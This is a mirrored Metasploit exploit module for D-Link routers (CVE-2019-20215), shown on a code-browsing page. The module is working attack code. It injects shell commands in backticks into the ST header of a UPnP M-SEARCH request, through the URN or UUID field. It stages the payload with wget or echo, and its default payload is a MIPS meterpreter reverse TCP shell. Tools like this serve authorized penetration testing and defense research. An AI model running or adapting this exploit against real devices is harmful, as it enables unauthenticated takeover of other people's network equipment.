Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/upnp/dlink_dir859_exec_ssdpcgi.rb
19721 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::Udp

10
  include Msf::Exploit::CmdStager

11
  include Msf::Module::Deprecated

12


13
  deprecated(Date.new(2024, 12, 1), 'Use `exploit/linux/upnp/dlink_upnp_msearch_exec` instead')

14


15
  def initialize(info = {})

16
    super(

17
      update_info(

18
        info,

19
        'Name' => 'D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi',

20
        'Description' => %q{

21
          D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi.

22
        },

23
        'Author' => [

24
          's1kr10s',

25
          'secenv'

26
        ],

27
        'License' => MSF_LICENSE,

28
        'References' => [

29
          ['CVE', '2019-20215'],

30
          ['URL', 'https://medium.com/@s1kr10s/2e799acb8a73']

31
        ],

32
        'DisclosureDate' => '2019-12-24',

33
        'Privileged' => true,

34
        'Platform' => 'linux',

35
        'Arch' => ARCH_MIPSBE,

36
        'DefaultOptions' => {

37
          'PAYLOAD' => 'linux/mipsbe/meterpreter_reverse_tcp',

38
          'CMDSTAGER::FLAVOR' => 'wget',

39
          'RPORT' => '1900'

40
        },

41
        'Targets' => [

42
          [ 'Auto',	{} ],

43
        ],

44
        'CmdStagerFlavor' => %w[echo wget],

45
        'DefaultTarget' => 0,

46
        'Notes' => {

47
          'Stability' => [CRASH_SAFE],

48
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],

49
          'Reliability' => [REPEATABLE_SESSION]

50
        }

51
      )

52
    )

53


54
    register_options(

55
      [

56
        Msf::OptEnum.new('VECTOR', [true, 'Header through which to exploit the vulnerability', 'URN', ['URN', 'UUID']])

57
      ]

58
    )

59
  end

60


61
  def exploit

62
    execute_cmdstager(linemax: 1500)

63
  end

64


65
  def execute_command(cmd, _opts)

66
    type = datastore['VECTOR']

67
    if type == 'URN'

68
      print_status('Target Payload URN')

69
      val = "urn:device:1;`#{cmd}`"

70
    else

71
      print_status('Target Payload UUID')

72
      val = "uuid:`#{cmd}`"

73
    end

74


75
    connect_udp

76
    header = "M-SEARCH * HTTP/1.1\r\n"

77
    header << "Host:239.255.255.250: #{datastore['RPORT']}\r\n"

78
    header << "ST:#{val}\r\n"

79
    header << "Man:\"ssdp:discover\"\r\n"

80
    header << "MX:2\r\n\r\n"

81
    udp_sock.put(header)

82
    disconnect_udp

83
  end

84
end

85


86